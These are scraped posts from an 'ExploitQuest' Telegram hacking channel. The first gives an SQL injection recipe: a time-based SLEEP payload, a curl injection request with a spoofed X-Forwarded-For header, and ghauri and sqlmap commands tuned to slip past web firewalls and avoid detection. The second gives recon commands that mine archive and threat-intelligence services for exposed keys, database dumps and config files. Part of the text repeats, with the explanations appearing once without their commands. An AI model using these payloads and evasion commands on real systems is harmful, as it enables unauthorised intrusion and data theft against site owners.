A Simple Yet Effective Way to Find SQLI Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here’s an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
━━━━━━━━━━━━━━━━━━
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable.
━━━━━━━━━━━━━━━━━━
3. Manual Testing with cURL
curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
•The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
•Modify headers like User-Agent to mimic real traffic.
━━━━━━━━━━━━━━━━━━
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Uses the most effective SQL injection techniques.
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Prevents certain characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
━━━━━━━━━━━━━━━━━━
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
━━━━━━━━━━━━━━━━━━
Conclusion
✅ Wayback Machine helps find old endpoints.
✅ Manual payloads help confirm basic SQL injection.
✅ Ghauri & SQLMap provide automation with WAF bypass techniques.
━━━━━━━━━━━━━━━━━━
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
Telegram
ExploitQuest
contact: @ExploitQuestbot
❤8👍2🔥1
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
•This query retrieves all archived URLs of example.com from Wayback Machine.
•*.example.com/* searches for all subdomains and pages.
•collapse=urlkey removes duplicate URLs.
•output=text formats the output as
plain text.
•fl=original extracts only the original URLs without extra metadata.
━━━━━━━━━━━━━━━━━━
Explanation:
•Retrieves a security report for example.com from VirusTotal.
•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
•Replace YOUR_API_KEY with a valid VirusTotal API key.
━━━━━━━━━━━━━━━━━━
Explanation:
•Queries AlienVault OTX for URLs associated with domain.com.
•limit=500 retrieves up to 500 URLs per page.
•page=1 fetches the first page of results.
━━━━━━━━━━━━━━━━━━
Explanation:
•Fetches all archived URLs of example.com from Wayback Machine.
•Saves the output to out.txt for further processing.
━━━━━━━━━━━━━━━━━━
Explanation:
1-cat out.txt → Reads the archived URLs from out.txt.
2-uro → Deduplicates and normalizes URLs.
3-grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:
•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi
━━━━━━━━━━━━━━━━━━
🔍 Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1️⃣ Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
•This query retrieves all archived URLs of example.com from Wayback Machine.
•*.example.com/* searches for all subdomains and pages.
•collapse=urlkey removes duplicate URLs.
•output=text formats the output as
plain text.
•fl=original extracts only the original URLs without extra metadata.
━━━━━━━━━━━━━━━━━━
2️⃣ Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
•Retrieves a security report for example.com from VirusTotal.
•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
•Replace YOUR_API_KEY with a valid VirusTotal API key.
━━━━━━━━━━━━━━━━━━
3️⃣ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
•Queries AlienVault OTX for URLs associated with domain.com.
•limit=500 retrieves up to 500 URLs per page.
•page=1 fetches the first page of results.
━━━━━━━━━━━━━━━━━━
4️⃣ Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
•Fetches all archived URLs of example.com from Wayback Machine.
•Saves the output to out.txt for further processing.
━━━━━━━━━━━━━━━━━━
5️⃣ Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1-cat out.txt → Reads the archived URLs from out.txt.
2-uro → Deduplicates and normalizes URLs.
3-grep -E → Uses regular expressions (regex) to extract potentially sensitive files, such as:
•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi
━━━━━━━━━━━━━━━━━━
🔍 Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
❤6👍5